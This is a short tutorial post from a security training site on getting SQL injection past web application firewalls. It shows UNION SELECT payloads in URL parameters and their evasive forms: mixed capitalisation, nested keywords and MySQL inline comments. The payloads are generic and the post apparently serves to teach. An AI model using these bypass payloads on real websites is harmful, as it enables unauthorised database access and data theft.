Part 2: Bypass a Web Application Firewall (WAF)

Ready to Start Your Career?

Create Free Account

By: S-Connect

July 29, 2016

By: S-Connect

July 29, 2016

By: S-Connect

July 29, 2016

Function Capitalization Technique:-For those WAF's, which filter only lowercase, we can easily bypass:Query!https://lxy.com/cost.php?id=90 UNION SELECT 1,2,3—Bypass!http://lxy.com/cost.php?id=-90 uniOn SeLeCt 1,2,3— Replaced Keywords Technique:-For those WAF's, which escape certain keywords such as UNION, SELECT, ORDER BY, and so on:Query!http://abcxyz.com/itemdetail.php?id=-57 UNION SELECT 1,2—Bypass!http://abcxyz.com/itemdetail.php?id=-57 UNIunionON SEselectLECT 1,2—Sqlihttp://xyz.com/pricing.php?id=32 union all select 1,2,3—-By passed Sqlihttp://xyz.com/pricing.php?id=32 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3—-

Stay Linked!!Ali Tabish

Start Trial

Create Free Account

Get Started:

Popular Courses:

Ways to contribute

Enterprise

Team

Recruit

Part 2: Bypass a Web Application Firewall (WAF)

Build your Cybersecurity or IT Career

Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry

Solutions

Platform

Company

Resources